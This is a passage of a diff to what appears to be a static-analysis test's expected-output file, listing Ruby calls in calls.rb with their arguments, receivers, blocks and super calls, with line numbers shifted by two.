calls.rb:272:5:272:5 | * ... | +| calls.rb:275:1:275:10 | call to foo | foo | 0 | calls.rb:275:5:275:9 | ** ... | +| calls.rb:276:1:276:13 | call to foo | foo | 0 | calls.rb:276:5:276:12 | ** ... | +| calls.rb:277:1:277:7 | call to foo | foo | 0 | calls.rb:277:5:277:6 | ** ... | +| calls.rb:280:1:280:14 | call to foo | foo | 0 | calls.rb:280:5:280:13 | Pair | +| calls.rb:281:1:281:17 | call to foo | foo | 0 | calls.rb:281:5:281:16 | Pair | +| calls.rb:290:5:290:16 | super call to my_method | my_method | 0 | calls.rb:290:11:290:16 | "blah" | +| calls.rb:291:5:291:17 | super call to my_method | my_method | 0 | calls.rb:291:11:291:11 | 1 | +| calls.rb:291:5:291:17 | super call to my_method | my_method | 1 | calls.rb:291:14:291:14 | 2 | +| calls.rb:291:5:291:17 | super call to my_method | my_method | 2 | calls.rb:291:17:291:17 | 3 | +| calls.rb:292:17:292:21 | ... + ... | + | 0 | calls.rb:292:21:292:21 | 1 | +| calls.rb:293:18:293:22 | ... * ... | * | 0 | calls.rb:293:22:293:22 | 2 | +| calls.rb:294:5:294:30 | super call to my_method | my_method | 0 | calls.rb:294:11:294:11 | 4 | +| calls.rb:294:5:294:30 | super call to my_method | my_method | 1 | calls.rb:294:14:294:14 | 5 | +| calls.rb:294:22:294:28 | ... + ... | + | 0 | calls.rb:294:26:294:28 | 100 | +| calls.rb:295:5:295:33 | super call to my_method | my_method | 0 | calls.rb:295:11:295:11 | 6 | +| calls.rb:295:5:295:33 | super call to my_method | my_method | 1 | calls.rb:295:14:295:14 | 7 | +| calls.rb:295:23:295:29 | ... + ... | + | 0 | calls.rb:295:27:295:29 | 200 | +| calls.rb:313:1:313:7 | call to call | call | 0 | calls.rb:313:6:313:6 | 1 | +| calls.rb:316:1:316:8 | call to foo= | foo= | 0 | calls.rb:316:12:316:13 | ... = ... | +| calls.rb:317:1:317:6 | ...[...] | [] | 0 | calls.rb:317:5:317:5 | 0 | +| calls.rb:317:1:317:6 | call to []= | []= | 0 | calls.rb:317:5:317:5 | 0 | +| calls.rb:317:1:317:6 | call to []= | []= | 1 | calls.rb:317:10:317:11 | ... = ... | +| calls.rb:318:1:318:8 | call to [] | [] | 0 | calls.rb:318:1:318:8 | 0 | +| calls.rb:318:1:318:8 | call to foo= | foo= | 0 | calls.rb:318:1:318:8 | ... = ... | +| calls.rb:318:12:318:19 | call to [] | [] | 0 | calls.rb:318:12:318:19 | _ .. _ | +| calls.rb:318:12:318:19 | call to bar= | bar= | 0 | calls.rb:318:12:318:19 | ... = ... | +| calls.rb:318:22:318:27 | ...[...] | [] | 0 | calls.rb:318:26:318:26 | 4 | +| calls.rb:318:22:318:27 | call to [] | [] | 0 | calls.rb:318:22:318:27 | -1 | +| calls.rb:318:22:318:27 | call to []= | []= | 0 | calls.rb:318:26:318:26 | 4 | +| calls.rb:318:22:318:27 | call to []= | []= | 1 | calls.rb:318:22:318:27 | ... = ... | +| calls.rb:318:31:318:42 | call to [] | [] | 0 | calls.rb:318:32:318:32 | 1 | +| calls.rb:318:31:318:42 | call to [] | [] | 1 | calls.rb:318:35:318:35 | 2 | +| calls.rb:318:31:318:42 | call to [] | [] | 2 | calls.rb:318:38:318:38 | 3 | +| calls.rb:318:31:318:42 | call to [] | [] | 3 | calls.rb:318:41:318:41 | 4 | +| calls.rb:319:1:319:1 | call to [] | [] | 0 | calls.rb:319:1:319:1 | 0 | +| calls.rb:319:5:319:10 | ...[...] | [] | 0 | calls.rb:319:9:319:9 | 5 | +| calls.rb:319:5:319:10 | call to [] | [] | 0 | calls.rb:319:5:319:10 | _ .. _ | +| calls.rb:319:5:319:10 | call to []= | []= | 0 | calls.rb:319:9:319:9 | 5 | +| calls.rb:319:5:319:10 | call to []= | []= | 1 | calls.rb:319:5:319:10 | ... = ... | +| calls.rb:319:14:319:22 | call to [] | [] | 0 | calls.rb:319:15:319:15 | 1 | +| calls.rb:319:14:319:22 | call to [] | [] | 1 | calls.rb:319:18:319:18 | 2 | +| calls.rb:319:14:319:22 | call to [] | [] | 2 | calls.rb:319:21:319:21 | 3 | +| calls.rb:320:1:320:10 | call to count= | count= | 1 | calls.rb:320:12:320:13 | __synth__1 | +| calls.rb:320:12:320:13 | ... + ... | + | 0 | calls.rb:320:15:320:15 | 1 | +| calls.rb:321:1:321:6 | ...[...] | [] | 0 | calls.rb:321:5:321:5 | 0 | +| calls.rb:321:1:321:6 | call to [] | [] | 0 | calls.rb:321:5:321:5 | __synth__1 | +| calls.rb:321:1:321:6 | call to []= | []= | 0 | calls.rb:321:5:321:5 | __synth__1 | +| calls.rb:321:1:321:6 | call to []= | []= | 2 | calls.rb:321:8:321:9 | __synth__2 | +| calls.rb:321:8:321:9 | ... + ... | + | 0 | calls.rb:321:11:321:11 | 1 | +| calls.rb:322:1:322:32 | ...[...] | [] | 0 | calls.rb:322:9:322:9 | 0 | +| calls.rb:322:1:322:32 | ...[...] | [] | 1 | calls.rb:322:12:322:18 | call to baz | +| calls.rb:322:1:322:32 | ...[...] | [] | 2 | calls.rb:322:21:322:31 | ... + ... | +| calls.rb:322:1:322:32 | call to [] | [] | 0 | calls.rb:322:9:322:9 | __synth__1 | +| calls.rb:322:1:322:32 | call to [] | [] | 1 | calls.rb:322:12:322:18 | __synth__2 | +| calls.rb:322:1:322:32 | call to [] | [] | 2 | calls.rb:322:21:322:31 | __synth__3 | +| calls.rb:322:1:322:32 | call to []= | []= | 0 | calls.rb:322:9:322:9 | __synth__1 | +| calls.rb:322:1:322:32 | call to []= | []= | 1 | calls.rb:322:12:322:18 | __synth__2 | +| calls.rb:322:1:322:32 | call to []= | []= | 2 | calls.rb:322:21:322:31 | __synth__3 | +| calls.rb:322:1:322:32 | call to []= | []= | 4 | calls.rb:322:34:322:35 | __synth__4 | +| calls.rb:322:21:322:31 | ... + ... | + | 0 | calls.rb:322:31:322:31 | 1 | +| calls.rb:322:34:322:35 | ... * ... | * | 0 | calls.rb:322:37:322:37 | 2 | +| calls.rb:330:25:330:37 | call to print | print | 0 | calls.rb:330:31:330:37 | "error" | +| calls.rb:334:3:334:12 | super call to foo | foo | 0 | calls.rb:334:9:334:11 | ... | +| calls.rb:338:3:338:13 | call to bar | bar | 0 | calls.rb:338:7:338:7 | b | +| calls.rb:338:3:338:13 | call to bar | bar | 1 | calls.rb:338:10:338:12 | ... | +| calls.rb:342:5:342:5 | call to [] | [] | 0 | calls.rb:342:5:342:5 | 0 | +| calls.rb:342:8:342:8 | call to [] | [] | 0 | calls.rb:342:8:342:8 | 1 | +| calls.rb:342:11:342:11 | call to [] | [] | 0 | calls.rb:342:11:342:11 | 2 | +| calls.rb:342:16:342:33 | call to [] | [] | 0 | calls.rb:342:17:342:23 | [...] | +| calls.rb:342:16:342:33 | call to [] | [] | 1 | calls.rb:342:26:342:32 | [...] | +| calls.rb:342:17:342:23 | call to [] | [] | 0 | calls.rb:342:18:342:18 | 1 | +| calls.rb:342:17:342:23 | call to [] | [] | 1 | calls.rb:342:20:342:20 | 2 | +| calls.rb:342:17:342:23 | call to [] | [] | 2 | calls.rb:342:22:342:22 | 3 | +| calls.rb:342:26:342:32 | call to [] | [] | 0 | calls.rb:342:27:342:27 | 4 | +| calls.rb:342:26:342:32 | call to [] | [] | 1 | calls.rb:342:29:342:29 | 5 | +| calls.rb:342:26:342:32 | call to [] | [] | 2 | calls.rb:342:31:342:31 | 6 | +| calls.rb:343:3:343:13 | call to foo | foo | 0 | calls.rb:343:7:343:7 | x | +| calls.rb:343:3:343:13 | call to foo | foo | 1 | calls.rb:343:10:343:10 | y | +| calls.rb:343:3:343:13 | call to foo | foo | 2 | calls.rb:343:13:343:13 | z | | calls.rb:346:1:346:10 | call to foo | foo | 0 | calls.rb:346:5:346:9 | Pair | -| calls.rb:347:1:347:7 | call to foo | foo | 0 | calls.rb:347:5:347:6 | Pair | -| calls.rb:352:13:352:17 | call to foo | foo | 0 | calls.rb:352:17:352:17 | x | -| calls.rb:362:5:362:6 | call to == | == | 0 | calls.rb:362:1:362:4 | __synth__0__1 | -| calls.rb:364:1:364:23 | call to bar | bar | 0 | calls.rb:364:10:364:10 | 1 | -| calls.rb:364:1:364:23 | call to bar | bar | 0 | calls.rb:364:10:364:10 | 1 | -| calls.rb:364:1:364:23 | call to bar | bar | 1 | calls.rb:364:12:364:12 | 2 | -| calls.rb:364:1:364:23 | call to bar | bar | 1 | calls.rb:364:12:364:12 | 2 | -| calls.rb:364:4:364:5 | call to == | == | 0 | calls.rb:364:1:364:3 | __synth__0__1 | +| calls.rb:347:1:347:15 | call to foo | foo | 0 | calls.rb:347:5:347:6 | Pair | +| calls.rb:347:1:347:15 | call to foo | foo | 1 | calls.rb:347:9:347:14 | Pair | +| calls.rb:348:1:348:10 | call to foo | foo | 0 | calls.rb:348:5:348:9 | Pair | +| calls.rb:349:1:349:7 | call to foo | foo | 0 | calls.rb:349:5:349:6 | Pair | +| calls.rb:354:13:354:17 | call to foo | foo | 0 | calls.rb:354:17:354:17 | x | +| calls.rb:364:5:364:6 | call to == | == | 0 | calls.rb:364:1:364:4 | __synth__0__1 | +| calls.rb:366:1:366:23 | call to bar | bar | 0 | calls.rb:366:10:366:10 | 1 | +| calls.rb:366:1:366:23 | call to bar | bar | 0 | calls.rb:366:10:366:10 | 1 | +| calls.rb:366:1:366:23 | call to bar | bar | 1 | calls.rb:366:12:366:12 | 2 | +| calls.rb:366:1:366:23 | call to bar | bar | 1 | calls.rb:366:12:366:12 | 2 | +| calls.rb:366:4:366:5 | call to == | == | 0 | calls.rb:366:1:366:3 | __synth__0__1 | callsWithReceiver | calls.rb:2:1:2:5 | call to foo | calls.rb:2:1:2:5 | self | | calls.rb:5:1:5:10 | call to bar | calls.rb:5:1:5:3 | Foo | @@ -288,108 +292,110 @@ callsWithReceiver | calls.rb:271:1:271:12 | call to foo | calls.rb:271:1:271:12 | self | | calls.rb:271:5:271:11 | * ... | calls.rb:271:6:271:11 | call to bar | | calls.rb:271:6:271:11 | call to bar | calls.rb:271:6:271:6 | X | -| calls.rb:274:1:274:10 | call to foo | calls.rb:274:1:274:10 | self | -| calls.rb:274:5:274:9 | ** ... | calls.rb:274:7:274:9 | call to bar | -| calls.rb:274:7:274:9 | call to bar | calls.rb:274:7:274:9 | self | -| calls.rb:275:1:275:13 | call to foo | calls.rb:275:1:275:13 | self | -| calls.rb:275:5:275:12 | ** ... | calls.rb:275:7:275:12 | call to bar | -| calls.rb:275:7:275:12 | call to bar | calls.rb:275:7:275:7 | X | -| calls.rb:278:1:278:14 | call to foo | calls.rb:278:1:278:14 | self | -| calls.rb:278:11:278:13 | call to bar | calls.rb:278:11:278:13 | self | -| calls.rb:279:1:279:17 | call to foo | calls.rb:279:1:279:17 | self | -| calls.rb:279:11:279:16 | call to bar | calls.rb:279:11:279:11 | X | -| calls.rb:290:17:290:21 | ... + ... | calls.rb:290:17:290:17 | x | -| calls.rb:291:18:291:22 | ... * ... | calls.rb:291:18:291:18 | x | -| calls.rb:292:22:292:28 | ... + ... | calls.rb:292:22:292:22 | x | -| calls.rb:293:23:293:29 | ... + ... | calls.rb:293:23:293:23 | x | -| calls.rb:303:5:303:7 | call to foo | calls.rb:303:5:303:7 | self | -| calls.rb:303:5:303:13 | call to super | calls.rb:303:5:303:7 | call to foo | -| calls.rb:304:5:304:14 | call to super | calls.rb:304:5:304:8 | self | -| calls.rb:305:5:305:15 | call to super | calls.rb:305:5:305:9 | super call to another_method | -| calls.rb:310:1:310:3 | call to foo | calls.rb:310:1:310:3 | self | -| calls.rb:310:1:310:6 | call to call | calls.rb:310:1:310:3 | call to foo | -| calls.rb:311:1:311:3 | call to foo | calls.rb:311:1:311:3 | self | -| calls.rb:311:1:311:7 | call to call | calls.rb:311:1:311:3 | call to foo | -| calls.rb:314:1:314:8 | call to foo | calls.rb:314:1:314:4 | self | -| calls.rb:314:1:314:8 | call to foo= | calls.rb:314:1:314:4 | self | -| calls.rb:315:1:315:3 | call to foo | calls.rb:315:1:315:3 | self | -| calls.rb:315:1:315:6 | ...[...] | calls.rb:315:1:315:3 | call to foo | -| calls.rb:315:1:315:6 | call to []= | calls.rb:315:1:315:3 | call to foo | -| calls.rb:316:1:316:8 | call to [] | calls.rb:316:1:316:8 | __synth__0 | +| calls.rb:272:1:272:6 | call to foo | calls.rb:272:1:272:6 | self | +| calls.rb:275:1:275:10 | call to foo | calls.rb:275:1:275:10 | self | +| calls.rb:275:5:275:9 | ** ... | calls.rb:275:7:275:9 | call to bar | +| calls.rb:275:7:275:9 | call to bar | calls.rb:275:7:275:9 | self | +| calls.rb:276:1:276:13 | call to foo | calls.rb:276:1:276:13 | self | +| calls.rb:276:5:276:12 | ** ... | calls.rb:276:7:276:12 | call to bar | +| calls.rb:276:7:276:12 | call to bar | calls.rb:276:7:276:7 | X | +| calls.rb:277:1:277:7 | call to foo | calls.rb:277:1:277:7 | self | +| calls.rb:280:1:280:14 | call to foo | calls.rb:280:1:280:14 | self | +| calls.rb:280:11:280:13 | call to bar | calls.rb:280:11:280:13 | self | +| calls.rb:281:1:281:17 | call to foo | calls.rb:281:1:281:17 | self | +| calls.rb:281:11:281:16 | call to bar | calls.rb:281:11:281:11 | X | +| calls.rb:292:17:292:21 | ... + ... | calls.rb:292:17:292:17 | x | +| calls.rb:293:18:293:22 | ... * ... | calls.rb:293:18:293:18 | x | +| calls.rb:294:22:294:28 | ... + ... | calls.rb:294:22:294:22 | x | +| calls.rb:295:23:295:29 | ... + ... | calls.rb:295:23:295:23 | x | +| calls.rb:305:5:305:7 | call to foo | calls.rb:305:5:305:7 | self | +| calls.rb:305:5:305:13 | call to super | calls.rb:305:5:305:7 | call to foo | +| calls.rb:306:5:306:14 | call to super | calls.rb:306:5:306:8 | self | +| calls.rb:307:5:307:15 | call to super | calls.rb:307:5:307:9 | super call to another_method | +| calls.rb:312:1:312:3 | call to foo | calls.rb:312:1:312:3 | self | +| calls.rb:312:1:312:6 | call to call | calls.rb:312:1:312:3 | call to foo | +| calls.rb:313:1:313:3 | call to foo | calls.rb:313:1:313:3 | self | +| calls.rb:313:1:313:7 | call to call | calls.rb:313:1:313:3 | call to foo | | calls.rb:316:1:316:8 | call to foo | calls.rb:316:1:316:4 | self | | calls.rb:316:1:316:8 | call to foo= | calls.rb:316:1:316:4 | self | -| calls.rb:316:12:316:19 | call to [] | calls.rb:316:12:316:19 | __synth__0 | -| calls.rb:316:12:316:19 | call to bar | calls.rb:316:12:316:15 | self | -| calls.rb:316:12:316:19 | call to bar= | calls.rb:316:12:316:15 | self | -| calls.rb:316:22:316:24 | call to foo | calls.rb:316:22:316:24 | self | -| calls.rb:316:22:316:27 | ...[...] | calls.rb:316:22:316:24 | call to foo | -| calls.rb:316:22:316:27 | call to [] | calls.rb:316:22:316:27 | __synth__0 | -| calls.rb:316:22:316:27 | call to []= | calls.rb:316:22:316:24 | call to foo | -| calls.rb:316:31:316:42 | * ... | calls.rb:316:31:316:42 | [...] | -| calls.rb:316:31:316:42 | call to [] | calls.rb:316:31:316:42 | Array | -| calls.rb:317:1:317:1 | call to [] | calls.rb:317:1:317:1 | __synth__0 | -| calls.rb:317:5:317:7 | call to foo | calls.rb:317:5:317:7 | self | -| calls.rb:317:5:317:10 | ...[...] | calls.rb:317:5:317:7 | call to foo | -| calls.rb:317:5:317:10 | call to [] | calls.rb:317:5:317:10 | __synth__0 | -| calls.rb:317:5:317:10 | call to []= | calls.rb:317:5:317:7 | call to foo | -| calls.rb:317:14:317:22 | * ... | calls.rb:317:14:317:22 | [...] | -| calls.rb:317:14:317:22 | call to [] | calls.rb:317:14:317:22 | Array | -| calls.rb:318:1:318:10 | call to count | calls.rb:318:1:318:4 | __synth__0 | -| calls.rb:318:1:318:10 | call to count | calls.rb:318:1:318:4 | self | -| calls.rb:318:1:318:10 | call to count= | calls.rb:318:1:318:4 | __synth__0 | -| calls.rb:318:12:318:13 | ... + ... | calls.rb:318:1:318:10 | call to count | -| calls.rb:319:1:319:3 | call to foo | calls.rb:319:1:319:3 | self | -| calls.rb:319:1:319:6 | ...[...] | calls.rb:319:1:319:3 | call to foo | -| calls.rb:319:1:319:6 | call to [] | calls.rb:319:1:319:3 | __synth__0 | -| calls.rb:319:1:319:6 | call to []= | calls.rb:319:1:319:3 | __synth__0 | -| calls.rb:319:8:319:9 | ... + ... | calls.rb:319:1:319:6 | call to [] | -| calls.rb:320:1:320:3 | call to foo | calls.rb:320:1:320:3 | self | -| calls.rb:320:1:320:7 | call to bar | calls.rb:320:1:320:3 | call to foo | -| calls.rb:320:1:320:32 | ...[...] | calls.rb:320:1:320:7 | call to bar | -| calls.rb:320:1:320:32 | call to [] | calls.rb:320:1:320:7 | __synth__0 | -| calls.rb:320:1:320:32 | call to []= | calls.rb:320:1:320:7 | __synth__0 | -| calls.rb:320:12:320:14 | call to foo | calls.rb:320:12:320:14 | self | -| calls.rb:320:12:320:18 | call to baz | calls.rb:320:12:320:14 | call to foo | -| calls.rb:320:21:320:23 | call to foo | calls.rb:320:21:320:23 | self | -| calls.rb:320:21:320:27 | call to boo | calls.rb:320:21:320:23 | call to foo | -| calls.rb:320:21:320:31 | ... + ... | calls.rb:320:21:320:27 | call to boo | -| calls.rb:320:34:320:35 | ... * ... | calls.rb:320:1:320:32 | call to [] | -| calls.rb:323:11:323:13 | call to bar | calls.rb:323:11:323:13 | self | -| calls.rb:324:13:324:15 | call to bar | calls.rb:324:13:324:15 | self | -| calls.rb:325:14:325:16 | call to bar | calls.rb:325:14:325:16 | self | -| calls.rb:326:18:326:20 | call to bar | calls.rb:326:18:326:20 | self | -| calls.rb:327:22:327:24 | call to bar | calls.rb:327:22:327:24 | self | -| calls.rb:328:13:328:15 | call to bar | calls.rb:328:13:328:15 | self | -| calls.rb:328:25:328:37 | call to print | calls.rb:328:25:328:37 | self | -| calls.rb:336:3:336:13 | call to bar | calls.rb:336:3:336:13 | self | -| calls.rb:340:1:342:3 | * ... | calls.rb:340:1:342:3 | __synth__0__1 | -| calls.rb:340:1:342:3 | call to each | calls.rb:340:16:340:33 | [...] | -| calls.rb:340:5:340:5 | call to [] | calls.rb:340:5:340:5 | __synth__0__1 | -| calls.rb:340:8:340:8 | call to [] | calls.rb:340:8:340:8 | __synth__0__1 | -| calls.rb:340:11:340:11 | call to [] | calls.rb:340:11:340:11 | __synth__0__1 | -| calls.rb:340:16:340:33 | call to [] | calls.rb:340:16:340:33 | Array | -| calls.rb:340:17:340:23 | call to [] | calls.rb:340:17:340:23 | Array | -| calls.rb:340:26:340:32 | call to [] | calls.rb:340:26:340:32 | Array | -| calls.rb:341:3:341:13 | call to foo | calls.rb:341:3:341:13 | self | -| calls.rb:344:1:344:10 | call to foo | calls.rb:344:1:344:10 | self | -| calls.rb:345:1:345:15 | call to foo | calls.rb:345:1:345:15 | self | +| calls.rb:317:1:317:3 | call to foo | calls.rb:317:1:317:3 | self | +| calls.rb:317:1:317:6 | ...[...] | calls.rb:317:1:317:3 | call to foo | +| calls.rb:317:1:317:6 | call to []= | calls.rb:317:1:317:3 | call to foo | +| calls.rb:318:1:318:8 | call to [] | calls.rb:318:1:318:8 | __synth__0 | +| calls.rb:318:1:318:8 | call to foo | calls.rb:318:1:318:4 | self | +| calls.rb:318:1:318:8 | call to foo= | calls.rb:318:1:318:4 | self | +| calls.rb:318:12:318:19 | call to [] | calls.rb:318:12:318:19 | __synth__0 | +| calls.rb:318:12:318:19 | call to bar | calls.rb:318:12:318:15 | self | +| calls.rb:318:12:318:19 | call to bar= | calls.rb:318:12:318:15 | self | +| calls.rb:318:22:318:24 | call to foo | calls.rb:318:22:318:24 | self | +| calls.rb:318:22:318:27 | ...[...] | calls.rb:318:22:318:24 | call to foo | +| calls.rb:318:22:318:27 | call to [] | calls.rb:318:22:318:27 | __synth__0 | +| calls.rb:318:22:318:27 | call to []= | calls.rb:318:22:318:24 | call to foo | +| calls.rb:318:31:318:42 | * ... | calls.rb:318:31:318:42 | [...] | +| calls.rb:318:31:318:42 | call to [] | calls.rb:318:31:318:42 | Array | +| calls.rb:319:1:319:1 | call to [] | calls.rb:319:1:319:1 | __synth__0 | +| calls.rb:319:5:319:7 | call to foo | calls.rb:319:5:319:7 | self | +| calls.rb:319:5:319:10 | ...[...] | calls.rb:319:5:319:7 | call to foo | +| calls.rb:319:5:319:10 | call to [] | calls.rb:319:5:319:10 | __synth__0 | +| calls.rb:319:5:319:10 | call to []= | calls.rb:319:5:319:7 | call to foo | +| calls.rb:319:14:319:22 | * ... | calls.rb:319:14:319:22 | [...] | +| calls.rb:319:14:319:22 | call to [] | calls.rb:319:14:319:22 | Array | +| calls.rb:320:1:320:10 | call to count | calls.rb:320:1:320:4 | __synth__0 | +| calls.rb:320:1:320:10 | call to count | calls.rb:320:1:320:4 | self | +| calls.rb:320:1:320:10 | call to count= | calls.rb:320:1:320:4 | __synth__0 | +| calls.rb:320:12:320:13 | ... + ... | calls.rb:320:1:320:10 | call to count | +| calls.rb:321:1:321:3 | call to foo | calls.rb:321:1:321:3 | self | +| calls.rb:321:1:321:6 | ...[...] | calls.rb:321:1:321:3 | call to foo | +| calls.rb:321:1:321:6 | call to [] | calls.rb:321:1:321:3 | __synth__0 | +| calls.rb:321:1:321:6 | call to []= | calls.rb:321:1:321:3 | __synth__0 | +| calls.rb:321:8:321:9 | ... + ... | calls.rb:321:1:321:6 | call to [] | +| calls.rb:322:1:322:3 | call to foo | calls.rb:322:1:322:3 | self | +| calls.rb:322:1:322:7 | call to bar | calls.rb:322:1:322:3 | call to foo | +| calls.rb:322:1:322:32 | ...[...] | calls.rb:322:1:322:7 | call to bar | +| calls.rb:322:1:322:32 | call to [] | calls.rb:322:1:322:7 | __synth__0 | +| calls.rb:322:1:322:32 | call to []= | calls.rb:322:1:322:7 | __synth__0 | +| calls.rb:322:12:322:14 | call to foo | calls.rb:322:12:322:14 | self | +| calls.rb:322:12:322:18 | call to baz | calls.rb:322:12:322:14 | call to foo | +| calls.rb:322:21:322:23 | call to foo | calls.rb:322:21:322:23 | self | +| calls.rb:322:21:322:27 | call to boo | calls.rb:322:21:322:23 | call to foo | +| calls.rb:322:21:322:31 | ... + ... | calls.rb:322:21:322:27 | call to boo | +| calls.rb:322:34:322:35 | ... * ... | calls.rb:322:1:322:32 | call to [] | +| calls.rb:325:11:325:13 | call to bar | calls.rb:325:11:325:13 | self | +| calls.rb:326:13:326:15 | call to bar | calls.rb:326:13:326:15 | self | +| calls.rb:327:14:327:16 | call to bar | calls.rb:327:14:327:16 | self | +| calls.rb:328:18:328:20 | call to bar | calls.rb:328:18:328:20 | self | +| calls.rb:329:22:329:24 | call to bar | calls.rb:329:22:329:24 | self | +| calls.rb:330:13:330:15 | call to bar | calls.rb:330:13:330:15 | self | +| calls.rb:330:25:330:37 | call to print | calls.rb:330:25:330:37 | self | +| calls.rb:338:3:338:13 | call to bar | calls.rb:338:3:338:13 | self | +| calls.rb:342:1:344:3 | * ... | calls.rb:342:1:344:3 | __synth__0__1 | +| calls.rb:342:1:344:3 | call to each | calls.rb:342:16:342:33 | [...] | +| calls.rb:342:5:342:5 | call to [] | calls.rb:342:5:342:5 | __synth__0__1 | +| calls.rb:342:8:342:8 | call to [] | calls.rb:342:8:342:8 | __synth__0__1 | +| calls.rb:342:11:342:11 | call to [] | calls.rb:342:11:342:11 | __synth__0__1 | +| calls.rb:342:16:342:33 | call to [] | calls.rb:342:16:342:33 | Array | +| calls.rb:342:17:342:23 | call to [] | calls.rb:342:17:342:23 | Array | +| calls.rb:342:26:342:32 | call to [] | calls.rb:342:26:342:32 | Array | +| calls.rb:343:3:343:13 | call to foo | calls.rb:343:3:343:13 | self | | calls.rb:346:1:346:10 | call to foo | calls.rb:346:1:346:10 | self | -| calls.rb:347:1:347:7 | call to foo | calls.rb:347:1:347:7 | self | -| calls.rb:352:13:352:17 | call to foo | calls.rb:352:13:352:17 | self | -| calls.rb:353:13:353:24 | call to unknown_call | calls.rb:353:13:353:24 | self | -| calls.rb:357:3:357:14 | call to unknown_call | calls.rb:357:3:357:14 | self | -| calls.rb:361:1:361:4 | call to list | calls.rb:361:1:361:4 | self | -| calls.rb:361:1:361:11 | call to empty? | calls.rb:361:1:361:4 | call to list | -| calls.rb:362:1:362:4 | call to list | calls.rb:362:1:362:4 | self | -| calls.rb:362:1:362:12 | call to empty? | calls.rb:362:1:362:4 | __synth__0__1 | -| calls.rb:362:1:362:12 | call to empty? | calls.rb:362:1:362:4 | call to list | -| calls.rb:362:5:362:6 | call to == | calls.rb:362:5:362:6 | nil | +| calls.rb:347:1:347:15 | call to foo | calls.rb:347:1:347:15 | self | +| calls.rb:348:1:348:10 | call to foo | calls.rb:348:1:348:10 | self | +| calls.rb:349:1:349:7 | call to foo | calls.rb:349:1:349:7 | self | +| calls.rb:354:13:354:17 | call to foo | calls.rb:354:13:354:17 | self | +| calls.rb:355:13:355:24 | call to unknown_call | calls.rb:355:13:355:24 | self | +| calls.rb:359:3:359:14 | call to unknown_call | calls.rb:359:3:359:14 | self | | calls.rb:363:1:363:4 | call to list | calls.rb:363:1:363:4 | self | -| calls.rb:363:1:363:12 | call to empty? | calls.rb:363:1:363:4 | call to list | -| calls.rb:364:1:364:3 | call to foo | calls.rb:364:1:364:3 | self | -| calls.rb:364:1:364:23 | call to bar | calls.rb:364:1:364:3 | __synth__0__1 | -| calls.rb:364:1:364:23 | call to bar | calls.rb:364:1:364:3 | call to foo | -| calls.rb:364:4:364:5 | call to == | calls.rb:364:4:364:5 | nil | +| calls.rb:363:1:363:11 | call to empty? | calls.rb:363:1:363:4 | call to list | +| calls.rb:364:1:364:4 | call to list | calls.rb:364:1:364:4 | self | +| calls.rb:364:1:364:12 | call to empty? | calls.rb:364:1:364:4 | __synth__0__1 | +| calls.rb:364:1:364:12 | call to empty? | calls.rb:364:1:364:4 | call to list | +| calls.rb:364:5:364:6 | call to == | calls.rb:364:5:364:6 | nil | +| calls.rb:365:1:365:4 | call to list | calls.rb:365:1:365:4 | self | +| calls.rb:365:1:365:12 | call to empty? | calls.rb:365:1:365:4 | call to list | +| calls.rb:366:1:366:3 | call to foo | calls.rb:366:1:366:3 | self | +| calls.rb:366:1:366:23 | call to bar | calls.rb:366:1:366:3 | __synth__0__1 | +| calls.rb:366:1:366:23 | call to bar | calls.rb:366:1:366:3 | call to foo | +| calls.rb:366:4:366:5 | call to == | calls.rb:366:4:366:5 | nil | callsWithBlock | calls.rb:17:1:17:17 | call to foo | calls.rb:17:5:17:17 | { ... } | | calls.rb:20:1:22:3 | call to foo | calls.rb:20:5:22:3 | do ... end | @@ -398,52 +404,52 @@ callsWithBlock | calls.rb:95:1:98:3 | call to foo | calls.rb:95:7:98:3 | do ... end | | calls.rb:226:1:228:3 | call to each | calls.rb:226:1:228:3 | { ... } | | calls.rb:229:1:231:3 | call to each | calls.rb:229:1:231:3 | { ... } | -| calls.rb:290:5:290:23 | super call to my_method | calls.rb:290:11:290:23 | { ... } | -| calls.rb:291:5:291:26 | super call to my_method | calls.rb:291:11:291:26 | do ... end | -| calls.rb:292:5:292:30 | super call to my_method | calls.rb:292:16:292:30 | { ... } | -| calls.rb:293:5:293:33 | super call to my_method | calls.rb:293:16:293:33 | do ... end | -| calls.rb:340:1:342:3 | call to each | calls.rb:340:1:342:3 | { ... } | -| calls.rb:364:1:364:23 | call to bar | calls.rb:364:15:364:23 | { ... } | -| calls.rb:364:1:364:23 | call to bar | calls.rb:364:15:364:23 | { ... } | +| calls.rb:292:5:292:23 | super call to my_method | calls.rb:292:11:292:23 | { ... } | +| calls.rb:293:5:293:26 | super call to my_method | calls.rb:293:11:293:26 | do ... end | +| calls.rb:294:5:294:30 | super call to my_method | calls.rb:294:16:294:30 | { ... } | +| calls.rb:295:5:295:33 | super call to my_method | calls.rb:295:16:295:33 | do ... end | +| calls.rb:342:1:344:3 | call to each | calls.rb:342:1:344:3 | { ... } | +| calls.rb:366:1:366:23 | call to bar | calls.rb:366:15:366:23 | { ... } | +| calls.rb:366:1:366:23 | call to bar | calls.rb:366:15:366:23 | { ... } | yieldCalls | calls.rb:31:3:31:7 | yield ... | | calls.rb:36:3:36:16 | yield ... | superCalls -| calls.rb:286:5:286:9 | super call to my_method | -| calls.rb:287:5:287:11 | super call to my_method | -| calls.rb:288:5:288:16 | super call to my_method | -| calls.rb:289:5:289:17 | super call to my_method | -| calls.rb:290:5:290:23 | super call to my_method | -| calls.rb:291:5:291:26 | super call to my_method | -| calls.rb:292:5:292:30 | super call to my_method | -| calls.rb:293:5:293:33 | super call to my_method | -| calls.rb:305:5:305:9 | super call to another_method | -| calls.rb:332:3:332:12 | super call to foo | +| calls.rb:288:5:288:9 | super call to my_method | +| calls.rb:289:5:289:11 | super call to my_method | +| calls.rb:290:5:290:16 | super call to my_method | +| calls.rb:291:5:291:17 | super call to my_method | +| calls.rb:292:5:292:23 | super call to my_method | +| calls.rb:293:5:293:26 | super call to my_method | +| calls.rb:294:5:294:30 | super call to my_method | +| calls.rb:295:5:295:33 | super call to my_method | +| calls.rb:307:5:307:9 | super call to another_method | +| calls.rb:334:3:334:12 | super call to foo | superCallsWithArguments -| calls.rb:288:5:288:16 | super call to my_method | 0 | calls.rb:288:11:288:16 | "blah" | -| calls.rb:289:5:289:17 | super call to my_method | 0 | calls.rb:289:11:289:11 | 1 | -| calls.rb:289:5:289:17 | super call to my_method | 1 | calls.rb:289:14:289:14 | 2 | -| calls.rb:289:5:289:17 | super call to my_method | 2 | calls.rb:289:17:289:17 | 3 | -| calls.rb:292:5:292:30 | super call to my_method | 0 | calls.rb:292:11:292:11 | 4 | -| calls.rb:292:5:292:30 | super call to my_method | 1 | calls.rb:292:14:292:14 | 5 